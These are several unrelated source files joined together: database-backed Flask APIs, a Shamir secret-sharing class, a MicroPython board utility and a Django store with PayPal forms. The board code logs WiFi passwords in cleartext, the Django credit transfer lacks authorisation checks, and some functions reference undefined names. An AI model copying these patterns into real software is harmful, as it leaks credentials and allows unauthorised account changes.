return '<{cls}: "{str}">'.format(cls=self.__class__.__name__, str=self.get_auth_string())
def get_creds_from_string(string):
"""
Parses a standardized string from `UncCredentials`'s `get_auth_string` method into a new
`UncCredentials` object and returns it. Whatever errors can be raised by `UncCredentials`'s
constructor can also be raised by this function.
"""
username, password = None, None
if ':' in string:
username, password = string.split(':', 1) # Always split on the first `:` in case the
# password contains it.
else:
username = string
return UncCredentials(username or None, password) # Usernames cannot be `''`, but password can be.
|
import sys
import pymysql as mysql
from flask import abort
from config import OPENAPI_AUTOGEN_DIR, DB_HOST, DB_USER, DB_PASSWD, DB_NAME
sys.path.append(OPENAPI_AUTOGEN_DIR)
from openapi_server import models
def db_cursor():
return mysql.connect(host=DB_HOST,user=DB_USER,passwd=<PASSWORD>,db=DB_NAME).cursor()
def get_gold_price():
with db_cursor() as cs:
cs.execute("SELECT month,times,price FROM gold")
months = ['Jan','Feb','Mar','Apr','May','Jun',
'Jul','Aug','Sep','Oct','Nov','Dec']
result = [
models.Gold(months[month-1],month,times,round(price,2))
for month,times,price in cs.fetchall()
]
return result
def get_gold_price_in_month(monthId):
with db_cursor() as cs:
cs.execute("""
SELECT month, times, price
FROM gold
WHERE month = %s
""", [monthId])
months = ['Jan','Feb','Mar','Apr','May','Jun',
'Jul','Aug','Sep','Oct','Nov','Dec']
result = [
models.Gold(months[month-1],month,times,round(amount,2))
for month,times,amount in cs.fetchall()
]
return result
def get_average_gold_price(monthId):
with db_cursor() as cs:
cs.execute("""
SELECT month, AVG(price)
FROM gold
WHERE month = %s
""", [monthId])
months = ['Jan','Feb','Mar','Apr','May','Jun',
'Jul','Aug','Sep','Oct','Nov','Dec']
result = cs.fetchone()
if result:
month = result[0]
price = round(result[1],2)
return models.GoldAverage(month, months[month-1], price)
else:
abort(404)
def get_average_monthly_gold_price():
with db_cursor() as cs:
cs.execute("""
SELECT month, AVG(price)
FROM gold
GROUP BY month
""")
months = ['Jan','Feb','Mar','Apr','May','Jun',
'Jul','Aug','Sep','Oct','Nov','Dec']
result = [
models.GoldAverage(months[month-1],month,round(amount,2))
for month,amount in cs.fetchall()
]
return result
def get_highest_gold_price():
with db_cursor() as cs:
cs.execute("""
SELECT month, price
FROM gold
ORDER BY price DESC
LIMIT 1
""")
months = ['Jan','Feb','Mar','Apr','May','Jun',
'Jul','Aug','Sep','Oct','Nov','Dec']
result = [
models.Gold(months[month-1],month,round(amount,2))
for month,amount in cs.fetchall()
]
return result
def get_lowest_gold_price():
with db_cursor() as cs:
cs.execute("""
SELECT month, price
FROM gold
ORDER BY price
LIMIT 1
""")
months = ['Jan','Feb','Mar','Apr','May','Jun',
'Jul','Aug','Sep','Oct','Nov','Dec']
result = [
models.Gold(months[month-1],month,round(amount,2))
for month,amount in cs.fetchall()
]
return result
def get_fuel():
with db_cursor() as cs:
cs.execute("""
SELECT fp.fuel_id, f.fuel
FROM fuel_price fp
INNER JOIN fuel f ON fp.fuel_id = f.ID
GROUP BY f.ID
""")
result = [
models.Fuel(fuelId,fname)
for fuelId,fname in cs.fetchall()
]
return result
def get_all_fuel_price():
with db_cursor() as cs:
cs.execute("""
SELECT fuel, month, day, price
FROM fuel_price fp
INNER JOIN fuel f ON f.ID = fp.fuel_id
""")
months = ['Jan','Feb','Mar','Apr','May','Jun',
'Jul','Aug','Sep','Oct','Nov','Dec']
result = [
models.FuelPrice(fname,month,months[month-1],day,round(price,2))
for fname,month,day,price in cs.fetchall()
]
return result
def get_fuel_price(fuelId):
with db_cursor() as cs:
cs.execute("""
SELECT fuel, month, day, price
FROM fuel_price fp
INNER JOIN fuel f ON f.ID = fp.fuel_id
WHERE fp.fuel_id=%s
ORDER BY month
""",[fuelId])
months = ['Jan','Feb','Mar','Apr','May','Jun',
'Jul','Aug','Sep','Oct','Nov','Dec']
result = [
models.FuelPrice(fname,month,months[month-1],day,round(price,2))
for fname,month,day,price in cs.fetchall()
]
return result
def get_fuel_price_by_month(monthId):
with db_cursor() as cs:
cs.execute("""
SELECT fuel_id,fuel, month, day, price
FROM fuel_price fp
INNER JOIN fuel f ON f.ID = fp.fuel_id
WHERE month=%s
""",[monthId])
months = ['Jan','Feb','Mar','Apr','May','Jun',
'Jul','Aug','Sep','Oct','Nov','Dec']
result = [
models.FuelDetail(fuelID,fname,month,months[month-1],day,round(price,2))
for fuelID,fname,month,day,price in cs.fetchall()
]
return result
def get_monthly_average_fuel_price(fuelId):
with db_cursor() as cs:
cs.execute("""
SELECT fuel,month, AVG(price)
FROM fuel_price fp
INNER JOIN fuel f ON f.ID = fp.fuel_id
WHERE fp.fuel_id = %s
GROUP BY month
ORDER BY month
""",[fuelId])
months = ['Jan','Feb','Mar','Apr','May','Jun',
'Jul','Aug','Sep','Oct','Nov','Dec']
result = [
models.FuelMonthlyAverage(fuel,months[month-1],month,round(price,2))
for fuel,month,price in cs.fetchall()
]
return result
def get_fuel_changing():
with db_cursor() as cs:
cs.execute("""
SELECT COUNT(price) as changing
FROM fuel_price
WHERE fuel_id = 2
""")
result = cs.fetchone()
if result:
value = result[0]
return value
else:
abort(404)
|
<gh_stars>1-10
# Copyright 2021 National Technology & Engineering Solutions
# of Sandia, LLC (NTESS). Under the terms of Contract DE-NA0003525 with NTESS,
# the U.S. Government retains certain rights in this software.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Functionality for working with Shamir-shared secrets."""
import numbers
import numpy
import shamir
from cicada.communicator.interface import Communicator
class ShamirArrayShare(object):
"""Stores a local share of a Shamir-secret-shared array.
Parameters
----------
shape: :class:`tuple`, required
The shape of the stored array.
storage: :class:`object`, required
Opaque storage for the secret-shared value. This is created and
manipulated by :class:`ShamirProtocol`, and is off-limits to all others!
"""
def __init__(self, shape, storage):
self._shape = shape
self._storage = storage
def __repr__(self):
return f"cicada.shamir.ShamirArrayShare(shape={self._shape}, storage={self._storage})" # pragma: no cover
class ShamirProtocol(object):
"""Uses a communicator to create and manipulate Shamir-secret-shared values.
Parameters
----------
communicator: :class:`cicada.communicator.interface.Communicator`, required
The communicator that this protocol will use for collective operations.
"""
def __init__(self, communicator):
if not isinstance(communicator, Communicator):
raise ValueError("A Cicada communicator is required.") # pragma: no cover
self._communicator = communicator
def _require_rank(self, rank, label):
if not isinstance(rank, numbers.Integral):
raise ValueError(f"Expected an integer for {label}, received {rank} instead.") # pragma: no cover
if rank < 0 or rank >= self.communicator.world_size:
raise ValueError(f"Expected {label} would be in the range [0, {self.communicator.world_size}), received {rank} instead.") # pragma: no cover
return int(rank)
def _require_rank_list(self, ranks, label):
ranks = [self._require_rank(rank, label) for rank in ranks]
if len(ranks) != len(set(ranks)):
raise ValueError(f"Expected unique values for {label}, received {ranks} instead.") # pragma: no cover
return ranks
@property
def communicator(self):
"""Returns the :class:`cicada.communicator.interface.Communicator` used by this protocol."""
return self._communicator
def reveal(self, share, src=None, dst=None):
"""Reconstruct a secret from its shares.
Note
----
This is a collective operation that *must* be called
by all players that are members of :attr:`communicator`.
Parameters
----------
share: :class:`ShamirArrayShare`, or :any:`None`, required
A local share of the secret to be revealed. This value is ignored
if the local player isn't contributing a share.
src: sequence of :class:`int`, optional
List of players who will supply shares of the secret to be revealed.
If :any:`None` (the default), all players will supply a share.
dst: sequence of :class:`int`, optional
List of players who will receive the revealed secret. If :any:`None`
(the default), the secret will be revealed to all players.
Returns
-------
value: :class:`numpy.ndarray` or :any:`None`
The revealed secret, if this player is a member of `dst`,
or :any:`None`.
"""
# Identify who will be providing shares.
if src is None:
src = self.communicator.ranks
# Identify who will be receiving shares.
if dst is None:
dst = self.communicator.ranks
# Enforce preconditions.
src = self._require_rank_list(src, "src")
dst = self._require_rank_list(dst, "dst")
if self.communicator.rank in src:
if not isinstance(share, ShamirArrayShare):
raise ValueError(f"share must be an instance of ShamirArrayShare, received {share} instead.") # pragma: no cover
# Unpack data to exchange with the other players.
value = (share._shape, share._storage) if self.communicator.rank in src else None
# Send data to the other players.
secret = None
for recipient in dst:
data = self.communicator.gatherv(src=src, value=value, dst=recipient)
# If we're a recipient, recover the secret.
if self.communicator.rank == recipient:
shapes, shares = zip(*data)
element_shares = numpy.array(shares).swapaxes(0, 1)
secrets = [shamir.recover_secret(shares) for shares in element_shares]
secret = numpy.array(secrets, dtype=object).reshape(shapes[0], order="C")
return secret
def share(self, *, src, secret, k, dst=None):
"""Distribute Shamir shares of a secret array.
Note
----
The input array must contain integers, and those integers
must all be >= 0.
This is a collective operation that *must* be called
by all players that are members of :attr:`communicator`.
Parameters
----------
src: integer, required
The player providing the secret array to be shared.
secret: :class:`numpy.ndarray` or :any:`None`, required
The secret array to be shared, which must contain integers >= 0.
This value is ignored for all players but `src`.
k: integer, required
Minimum number of shares required to reveal the secret.
Must be <= the number of players that are members of
:attr:`communicator`.
dst: sequence of :class:`int`, optional.
List of players who will receive shares of the secret. If
:any:`None` (the default), all players will receive a share.
Returns
-------
share: :class:`ShamirArrayShare` or :any:`None`
Local share of the shared secret, if this player is a member of
`dst`, or :any:`None`.
"""
# Identify who will be receiving shares.
if dst is None:
dst = self.communicator.ranks
# Enforce preconditions.
src = self._require_rank(src, "src")
if self.communicator.rank == src:
if not isinstance(secret, numpy.ndarray):
raise ValueError(f"secret must be an instance of numpy.ndarray, received {secret} instead.") # pragma: no cover
if not issubclass(secret.dtype.type, (numpy.integer, object)):
raise ValueError(f"secret must contain integers, received {secret.dtype} instead.") # pragma: no cover
if not numpy.all(secret >= 0):
raise ValueError("secret must contain values >= 0.") # pragma: no cover
k = int(k)
if not (1 <= k and k <= len(dst)):
raise ValueError(f"k must be an integer in the range [1, {len(dst)}], received {k} instead.") # pragma: no cover
# Create a shamir share for each element in the secret.
if self.communicator.rank == src:
all_shares = []
for element in secret.flat: # Returns elements in C-style (last index varies fastest) order.
constant, shares = shamir.make_random_shares(k, len(dst))
shares = numpy.array(shares)
shares[:,1] -= constant
shares[:,1] += element
all_shares.append(shares)
all_shares = numpy.array(all_shares)
all_shares = all_shares.swapaxes(0, 1)
values = [(secret.shape, shares) for shares in all_shares]
else:
values = None
# Distribute shares to all players.
shares = self.communicator.scatterv(src=src, values=values, dst=dst)
# Package the shares.
return shares if shares is None else ShamirArrayShare(shares[0], shares[1])
|
<filename>app/main.py
#!flask/bin/python
# Python
import os
import requests
import json
import MySQLdb
from datetime import date, datetime, timedelta
# FLASK
from flask import Flask, jsonify, request
from flask_cors import CORS, cross_origin
# Data Science
import pandas as pd
import numpy as np
from scipy import stats
from scipy.spatial import ConvexHull
import matplotlib.pyplot as plt
from pandas import DataFrame
from sklearn.cluster import DBSCAN
from geopy.distance import great_circle, geodesic
# Para geoposicion
from shapely import affinity
from shapely.geometry import MultiPoint, Point, LinearRing, Polygon
# Declaramos el APP Flask
app = Flask(__name__)
CORS(app)
# Servidores de Mysql
sv1 = MySQLdb.connect(host="ip", port=3306,
user="USUARIO", passwd="password", db="database_name")
def calculo():
""" Metodo para el calculo de los puntos de paradas frecuentes o puntos de calor """
# Consultamos la data para el calculos de las paradas frecuentes
sv1.ping(True)
cur = sv1.cursor()
cur.execute(
""" SELECT id, plate, timestamp AS fecha, latitude as lat, longitude as lon, timeOff FROM RuteoDynamic2 WHERE timestamp>1579496400 """)
data = cur.fetchall()
itms = []
for row in data:
dtPE = row[2]-18000
hora = roundDatetime(datetime.fromtimestamp(
dtPE), timedelta(minutes=30)).strftime("%H.%M")
itms.append({
'id': row[0],
'plate': row[1],
'fecha': datetime.fromtimestamp(dtPE).strftime("%d/%m/%Y %H:%M:%S"),
'hora': float(hora),
'lat': row[3],
'lon': row[4]
})
cur.close()
# Obtenemos un DataFrame de la consulta con Pandas
df = pd.DataFrame(itms)
# Asignamos valores para el calculo
coords = df[['lat', 'lon']].values
coords2 = df[['lat', 'lon', 'hora', 'plate']].values
# Se realiza los clustering de los puntos sercanos en un radio no mayor a 100m (Paradas frecuentes)
kms_per_radian = 6371.0088
epsilon = 0.07 / kms_per_radian
db = DBSCAN(eps=epsilon, min_samples=1, algorithm='ball_tree',
metric='haversine').fit(np.radians(coords))
cluster_labels = db.labels_
num_clusters = len(set(cluster_labels))
clusters = pd.Series([coords[cluster_labels == n]
for n in range(num_clusters)])
clusters2 = pd.Series([coords2[cluster_labels == n]
for n in range(num_clusters)])
poligonos = pd.DataFrame({'poligon': clusters2})
# Buscamos el punto mas central entre los puntos mas frecuentes de paradas (centroides)
def get_centermost_point(cluster):
centroid = (MultiPoint(cluster).centroid.x,
MultiPoint(cluster).centroid.y)
centermost_point = min(
cluster, key=lambda point: great_circle(point, centroid).m)
return tuple(centermost_point)
# Asignamos
centermost_points = clusters.map(get_centermost_point)
# Los definimos en un dicionario de latitudes y longitudes
lats, lons = zip(*centermost_points)
# Lo adicionamos en un dataframe para manipularlo
rep_points = pd.DataFrame({'lat': lats, 'lon': lons})
# Anexamos sus atributos correspondientes
rs = rep_points.apply(lambda row: df[(df['lat'] == row['lat']) & (
df['lon'] == row['lon'])].iloc[0], axis=1)
horas = []
horas_s = []
plates = []
for n in range(num_clusters):
x = pd.DataFrame(poligonos['poligon'][n])[[2]].values
moda, count = stats.mode(poligonos['poligon'][n])
horas.append(moda[0][2])
horas_s.append(clusterTime(x))
plates.append(moda[0][3])
# print(moda)
indice_moda = pd.DataFrame({
'moda': horas,
'moda_s': horas_s,
'moda_plate': plates})
# Obtenemos los puntos de calor o paradas frecuentes y lo exportamos a un json para mostrar
datafinal = pd.concat([rs, indice_moda, poligonos],
axis=1).sort_values(by='moda')
# Eliminamos la data que no cumpla con la condicion de minimo 4 puntos en su poligono
datafinal.drop(
datafinal[datafinal.poligon.str.len() <= 3].index, inplace=True)
# datafinal.drop(['poligon'], axis=1)
datafinal.to_csv('puntos.csv', header=True, index=False)
return datafinal
@app.route('/')
def index():
""" index """
w = {
'msg': 'Api Ruteo Dynamic!'
}
return jsonify(w)
@app.route('/loader')
def loader():
""" Loader """
csv = calculo()
w = {
'msg': 'Api Ruteo Dynamic, Calculo Hecho!'
}
return jsonify(w)
@app.route('/puntos')
def puntos():
""" Muestra todos los puntos de paradas globales dentro de la mega geozona """
Export = []
# Total de puntos generados por el algoritmo de cluster
puntos = pd.read_csv('puntos.csv')
# Iteración por filas del DataFrame:
for i, row in puntos.iterrows():
Export.append({
"type": "Feature",
"properties": {
"name": "Parada Frecuente",
"moda": str(row[6]).replace(".", ":")+"0",
"moda_s": str(row[7]).replace(".", ":")+"0",
"moda_plate": row[8]
# "poligon": np.array(row[8]).tolist()
},
"geometry": {
"type": "Point",
"coordinates": [row[5], row[4]]
}
})
return jsonify(Export)
@app.route('/puntos/cda/<cda>')
def cda_n(cda):
""" Muestra todos los puntos de paradas globales dentro de la mega geozona """
Export = []
today = date.today().strftime("%d/%m/%Y")
# Total de puntos generados por el algoritmo de cluster
puntos = pd.read_csv('puntos.csv')
# Poligonos de la zona de reparto
poligono = polyReparto('', today, cda)
# Obtenemos las cordenadas del poligono de la union de las zonas de repartos por cda
# poly = Polygon(PolyConvex(poligono))
poly = affinity.scale(Polygon(PolyConvex(poligono)), xfact=1.5, yfact=1.5)
# Poligono de la zona de reparto y le aumentamos 20% del su area para abarcar puntos sercanos a esa zona
# poly = affinity.scale(Polygon(poligono), xfact=1.1, yfact=1.1)
# Chequeamos que del universo de puntos frecuentes se enceuntre dentro de nuestro poligono de reparto y filtramos
dentro = puntos[puntos.apply(
lambda row: poly.contains(Point(row.lat, row.lon)), axis=1)]
# Imprimir cordenadas dentro de la zona de reparto
dentro_a = dentro.apply(lambda row: puntos[(puntos['lat'] == row['lat']) & (
puntos['lon'] == row['lon'])].iloc[0], axis=1).sort_values(by='moda')
# Iteración por filas del DataFrame:
for i, row in dentro_a.iterrows():
Export.append({
"type": "Feature",
"properties": {
"name": "<NAME>",
"moda": str(row[6]).replace(".", ":")+"0",
"moda_s": str(row[7]).replace(".", ":")+"0",
"moda_plate": row[8]
# "poligon": np.array(row[8]).tolist()
},
"geometry": {
"type": "Point",
"coordinates": [row[5], row[4]]
}
})
return jsonify(Export)
@app.route('/puntos/<ruta>')
def reparto(ruta):
""" Muestra todos los puntos de paradas dentro de la zona de reparto """
Export = []
# Poligono de la zona de reparto
poligono = polyReparto(ruta)
# Cargar puntos globales de parada en la mega geozona
puntos = pd.read_csv('puntos.csv')
# Poligono de la zona de reparto y le aumentamos 30% del su area para abarcar puntos sercanos a esa zona
poly = affinity.scale(Polygon(poligono), xfact=1.2, yfact=1.2)
# Chequeamos que del universo de puntos frecuentes se enceuntre dentro de nuestro poligono de reparto y filtramos
dentro = puntos[puntos.apply(
lambda row: poly.contains(Point(row.lat, row.lon)), axis=1)]
# Imprimir cordenadas dentro de la zona de reparto
dentro_a = dentro.apply(lambda row: puntos[(puntos['lat'] == row['lat']) & (
puntos['lon'] == row['lon'])].iloc[0], axis=1).sort_values(by='moda')
# Asignamos a un json todos los puntos de paradas para mostrar
# Export = dentro_a.to_json(orient='records')
# Iteración por filas del DataFrame:
for i, row in dentro_a.iterrows():
Export.append({
"type": "Feature",
"properties": {
"name": "<NAME>",
"moda": str(row[6]).replace(".", ":")+"0",
"moda_s": str(row[7]).replace(".", ":")+"0",
"moda_plate": row[8]
},
"geometry": {
"type": "Point",
"coordinates": [row[5], row[4]]
}
})
return jsonify(Export)
def roundDatetime(dt, delta):
""" Funcion para redondiar las horas para normalizar
el calculo de la moda de la hora frecuente.
"""
return dt + (datetime.min - dt) % delta
def polyReparto(ruta, today="", cda=""):
""" Metodo para la extracción del poligono de la
zona de reparto en el servidor 4 (SIM). """
sv4.ping(True)
cur = sv4.cursor()
# query = "SELECT * FROM I_Rutas_Zonas WHERE fecha_programada = %s" if today != "" else "SELECT * FROM I_Rutas_Zonas WHERE id_ruta = %s"
if today != "":
query = """
SELECT zr.id, zr.id_ruta, GROUP_CONCAT(zr.vertices) vertice
FROM I_Rutas_Zonas zr
LEFT JOIN I_Rutas r ON (r.id=zr.id_ruta)
LEFT JOIN I_Importacion i ON (i.id=r.id_importacion)
LEFT JOIN M_Paneles p ON (p.cda_id = i.cda_id AND p.canal_id = i.canal_id AND p.panel_id = r.id_panel)
WHERE
i.fecha_programada= %s AND
i.cda_id = %s AND
p.tipo = "horizontal" AND
p.canal_id ="tradicional"
"""
cur.execute(query, (today, cda))
else:
query = "SELECT * FROM I_Rutas_Zonas WHERE id_ruta = %s"
cur.execute(query, (ruta, ))
data = cur.fetchall()
itms = []
itms.append([tuple(float(c) for c in itm.split("/"))
for itm in data[0][2].split(",")])
cur.close()
return itms[0]
def clusterTime(x):
""" Clustering al tiempo de la parada """
clustering = DBSCAN(eps=2, min_samples=3).fit(x)
cluster_labels = clustering.labels_
num_clusters = len(set(cluster_labels))
clusters = pd.Series([x[cluster_labels == n]for n in range(num_clusters)])
h = []
for n in range(num_clusters):
# for i in range(len(clusters[n])):
moda = stats.mode(clusters[n])
if len(moda[0]) != 0:
h.append(moda[0][0][0])
r = h[1] if len(h) > 1 else 0
return r
def PolyConvex(poligono):
""" Funcion para calcular el poligono con una serie
de cordenadas dada
"""
points = np.array(poligono)
hull = ConvexHull(points)
ps = set()
for x, y in hull.simplices:
ps.add(x)
ps.add(y)
ps = np.array(list(ps))
p = pd.DataFrame(points)
return p.iloc[ps].values
if __name__ == '__main__':
if os.environ['ENVIRONMENT'] == 'production':
app.run(port=80, host='0.0.0.0')
|
<reponame>idimitrakopoulos/illuminOS
import lib.toolkit as tk
from lib.toolkit import log
class Board:
pin_mapping = []
button_click_counter = {}
# @timed_function
def __init__(self, pin_mapping):
self.pin_mapping = pin_mapping
# @timed_function
def get_pin_mapping(self):
return self.pin_mapping
# @timed_function
def set_pin_mapping(self, pin_mapping):
self.pin_mapping = pin_mapping
# @timed_function
def get_pin_by_key(self, pin_key):
return self.pin_mapping[pin_key]
# @timed_function
def set_pin(self, pin_key, pin):
self.pin_mapping[pin_key] = pin
# @timed_function
def get_pin_value(self, pin):
return pin.value()
# @timed_function
def scan_wifi(self, mode):
import network
n = network.WLAN(mode)
return n.scan()
# @timed_function
def connect_to_wifi(self, ssid, password, mode, wait_for_ip=0):
import network, time
log.info("Attempting to connect to WiFi '{}' with password '{}'...".format(ssid, password))
n = network.WLAN(mode)
n.active(True)
n.connect(ssid, password)
# Wait for IP address to be provided
count = 0
while not n.isconnected() and count < wait_for_ip:
log.info("Waiting to obtain IP ... ({} sec remaining)".format(str(wait_for_ip - count)))
time.sleep(1)
count += 1
# Get provided IP
ip = n.ifconfig()[0]
if ip == "0.0.0.0":
log.info("Could not obtain IP on '{}'".format(ssid))
else:
log.info("Connected with IP '{}'".format(ip))
return ip
# @timed_function
def blink_onboard_led(self, times, delay, led):
import time
# Do blinking
for i in range(times):
led.high()
time.sleep(delay)
led.low()
time.sleep(delay)
# Return to off state
led.high()
# @timed_function
def get_onboard_button_events(self, btn, bcc_key, on_single_click, on_double_click):
import gc
from machine import Timer
if btn.value() == 0:
self.button_click_counter[bcc_key] += 1
if self.button_click_counter[bcc_key] == 1:
log.info("single-click registered (mem free: " + str(gc.mem_free()) + ")")
sc = getattr(tk, on_single_click)
sc()
elif self.button_click_counter[bcc_key] == 2:
log.info("double click registered (mem free: " + str(gc.mem_free()) + ")")
sc = getattr(tk, on_double_click)
sc()
else:
pass
gtim = Timer(1)
gtim.init(period=300, mode=Timer.ONE_SHOT, callback=lambda t:self.reset_onboard_button_event_counter(bcc_key))
# @timed_function
def reset_onboard_button_event_counter(self, bcc_key):
log.info("FBC resetting to 0. Previous was " + str(self.button_click_counter[bcc_key]))
self.button_click_counter[bcc_key] = 0
return self.button_click_counter[bcc_key]
# @timed_function
def format(self):
import uos
log.info("Formatting filesystem ...")
while uos.listdir("/"):
lst = uos.listdir("/")
uos.chdir("/")
while lst:
try:
uos.remove(lst[0])
log.info("Removed '" + uos.getcwd() + "/" + lst[0] + "'")
lst = uos.listdir(uos.getcwd())
except:
dir = lst[0]
log.info("Directory '" + uos.getcwd() + "/" + dir + "' detected. Opening it...")
uos.chdir(dir)
lst = uos.listdir(uos.getcwd())
if len(lst) == 0:
log.info("Directory '" + uos.getcwd() + "' is empty. Removing it...")
uos.chdir("..")
uos.rmdir(dir)
break
log.info("Format completed successfully")
def start_memory_manager(self, period=5000):
from machine import Timer
tim = Timer(0)
tim.init(period=period, mode=Timer.PERIODIC, callback=lambda t: self.mem_cleanup())
def mem_cleanup(self):
import gc
log.debug("Invoking garbage collection ...")
gc.collect()
mem = gc.mem_free()
if 6001 <= mem <= 10000:
log.warn("Memory is low: " + str(mem))
elif 4001 <= mem <= 6000:
log.warn("Memory is very low: " + str(mem))
elif mem < 4000:
log.critical("Memory is extremely low: {}".format(str(mem)))
else:
log.debug("Memory is currently: " + str(mem))
def get_public_ip(self):
from lib.toolkit import http_get
"""
This is a rather hacky way to get the external IP
but it avoids importing urequests module which is heavy on mem usage.
"""
s = http_get("http://myexternalip.com/raw")
ip = ""
for x in range(0, 10):
ip = (s.readline().decode('ascii')).strip("\n")
return ip
def sleep(self, milliseconds):
# To be able to use this fea
import machine
# configure RTC.ALARM0 to be able to wake the device
rtc = machine.RTC()
rtc.irq(trigger=rtc.ALARM0, wake=machine.DEEPSLEEP)
# set RTC.ALARM0 to fire after some milliseconds
rtc.alarm(rtc.ALARM0, milliseconds)
# put the device to sleep
machine.deepsleep()
def reboot(self):
log.info("Rebooting board ...")
import machine
machine.reset() |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import json,time
from django.contrib.auth.models import User
from django.conf import settings
from django.http import HttpResponse as response
from django.http import HttpResponseRedirect as redirect
from django.shortcuts import render
from paypal.standard.forms import PayPalPaymentsForm
from paypal.standard.ipn.signals import payment_was_successful
from shipping import fretefacil,correios
from datetime import datetime
from socialize.models import Profile
from shipping.models import Deliverable
from efforia.views import *
from efforia.main import Efforia
from feedly.models import Basket
from app import Images
from models import Product
class Cancel(Efforia):
def __init__(self): pass
def cancel(self,request):
u = self.current_user(request)
Cart.objects.all().filter(user=u).delete()
self.redirect('/')
#value = int(self.request.arguments['credit'])
#self.current_user().profile.credit -= value
#self.current_user().profile.save()
class Payments(Efforia):
def __init__(self): pass
def view_recharge(self,request):
paypal_dict = {
"business": settings.PAYPAL_RECEIVER_EMAIL,
"amount": "1.19",
"item_name": "Créditos do Efforia",
"invoice": "unique-invoice-id",
"notify_url": "http://www.efforia.com.br/paypal",
"return_url": "http://www.efforia.com.br/",
"cancel_return": "http://www.efforia.com.br/cancel",
'currency_code': 'BRL',
'quantity': '1'
}
payments = PayPalPaymentsForm(initial=paypal_dict)
form = CreditForm()
return render(request,"recharge.jade",{'form':payments,'credit':form},content_type='text/html')
def update_credit(self,request):
value = int(request.POST['credit'][0])
current_profile = Profile.objects.all().filter(user=self.current_user(request))[0]
if value > current_profile.credit: return self.view_recharge(request)
else:
current_profile.credit -= value
current_profile.save()
if 'other' in request.POST:
iden = int(request.POST['other'][0])
u = User.objects.all().filter(id=iden)[0]
p = Profile.objects.all().filter(user=u)[0]
p.credit += value
p.save()
self.accumulate_points(1,request)
return response('')
class Mail(Efforia,correios.Correios):
def __init__(self): pass
def postal_code(self,request):
u = self.current_user(request)
s = ''; mail_code = request.GET['address']
q = self.consulta(mail_code)[0]
d = fretefacil.create_deliverable('91350-180',mail_code,'30','30','30','0.5')
value = fretefacil.delivery_value(d)
formatted = '<div>Valor do frete: R$ <div style="display:inline;" class="delivery">%s</div></div>' % value
for i in q.values(): s += '<div>%s\n</div>' % i
s += formatted
now,objs,rels = self.get_object_bydate(request.GET['object'],'$$')
obj = globals()[objs].objects.all().filter(date=now)[0]
deliverable = Deliverable(product=obj,buyer=u,mail_code=mail_code,code=d['sender'],receiver=d['receiver'],
height=int(d['height']),length=int(d['length']),width=int(d['width']),weight=int(float(d['weight'][0])*1000.0),value=value)
deliverable.save()
return response(s)
class Deliveries(Efforia):
def __init__(self): pass
def view_package(self,request):
u = self.current_user(request)
form = DeliveryForm()
form.fields['address'].label = 'CEP'
if 'quantity' in request.GET:
quantity = request.GET['quantity']
credit = int(request.GET['credit'])
else:
quantity = 1; credit = 1
paypal_dict = {
"business": settings.PAYPAL_RECEIVER_EMAIL,
"amount": "1.00",
"item_name": "Produto do Efforia",
"invoice": "unique-invoice-id",
"notify_url": "http://www.efforia.com.br/paypal",
"return_url": "http://www.efforia.com.br/delivery",
"cancel_return": "http://www.efforia.com.br/cancel",
'currency_code': 'BRL',
'quantity': quantity,
}
payments = PayPalPaymentsForm(initial=paypal_dict)
diff = credit-u.profile.credit
if diff < 0: diff = 0
return render(request,"delivery.jade",{
'payments':payments,
'credit':diff,
'form':form
},content_type='text/html')
def create_package(self,request):
u = self.current_user(request)
Cart.objects.all().filter(user=u).delete()
return self.redirect('/')
class SpreadBasket(Basket):
def product(self,prodid):
# for p in basket:
# quantity += p.quantity
# value += p.product.credit*p.quantity
pass
class Store(Efforia):
def __init__(self): pass
def view_product(self,request):
u = self.current_user(request)
if 'action' in request.GET:
deliver = list(Deliverable.objects.all().filter(buyer=u))
if not len(deliver) or 'more' in request.GET:
products = list(Product.objects.all())
return self.render_grid(list(products),request)
else: return self.render_grid(deliver,request)
elif 'product' in request.GET:
id = int(request.REQUEST['product'])
prod = Product.objects.all().filter(id=id)[0]
return render(request,'productview.jade',{'product':prod})
else:
return render(request,'product.jade',{'static_url':settings.STATIC_URL},content_type='text/html')
def create_product(self,request):
u = self.current_user(request)
e = json.load(open('%s/json/elements.json'%settings.STATIC_ROOT))
c = request.REQUEST['category']
category = e['locale_cat'].index(c)
credit = request.REQUEST['credit']
name = request.REQUEST['name']
description = request.REQUEST['description']
product = Product(category=category,credit=credit,visual='',
name='$$%s'%name,description=description,user=u)
product.save()
return redirect('productimage')
def view_image(self,request):
return render(request,'upload.jade',{'static_url':settings.STATIC_URL})
def create_image(self,request):
images = Images()
u = self.current_user(request)
url = images.upload_image(request)
products = Product.objects.filter(user=u)
latest = list(products)[-1:][0]
latest.visual = url
latest.save()
return response("Product created successfully")
#payment_was_successful.connect(confirm_payment)
|
<reponame>ngageoint/mrgeo<gh_stars>100-1000
from __future__ import print_function
import re
import sys
import traceback
from py4j.java_gateway import JavaClass, java_import
from pymrgeo.code_generator import CodeGenerator
from pymrgeo.instance import is_instance_of
from pymrgeo.java_gateway import is_remote
from pymrgeo.rastermapop import RasterMapOp
from pymrgeo.vectormapop import VectorMapOp
# Some MrGeo map ops include operators as their function name. Each
# of those operators work in command-line map algebra. This data
# structure determines how/if those operators are overloaded in
# Python for MrGeo.
#
# The key is the name/symbol of the operator. The value is an array
# of two elements, the first being an array of python "magic methods"
# to map the operator to when the left-hand operand is "self" (e.g. an
# image or vector map op). The second element is an array of python
# "magic methods" to map to the operator when the right-hand operand
# is "self" (e.g. "2 ** image"). For operators where operand ordering
# does not matter (e.g. +, *, etc...) or there is only one operand,
# the second element is an empty array. For operators that cannot be
# overridden in python, both elements of the array are empty arrays.
#
# A scenario where this is important is with the expression "image ** 2"
# compared to "2 ** image". In the first case, python will invoke the
# __pow__ magic mathod on the image object (so image is "self" when the
# method is called. In the second case, python will invoke __rand__ again
# where "self" is image. However, in that case, our overridden method
# needs to invoke map algebra on the Java/Scala side with the arguments
# reversed.
_operators = {"+": [["__add__", "__iadd__", "__radd__"], []],
"-": [["__sub__", "__isub__"], ["__rsub__"]],
"*": [["__mul__", "__imul__", "__rmul__"], []],
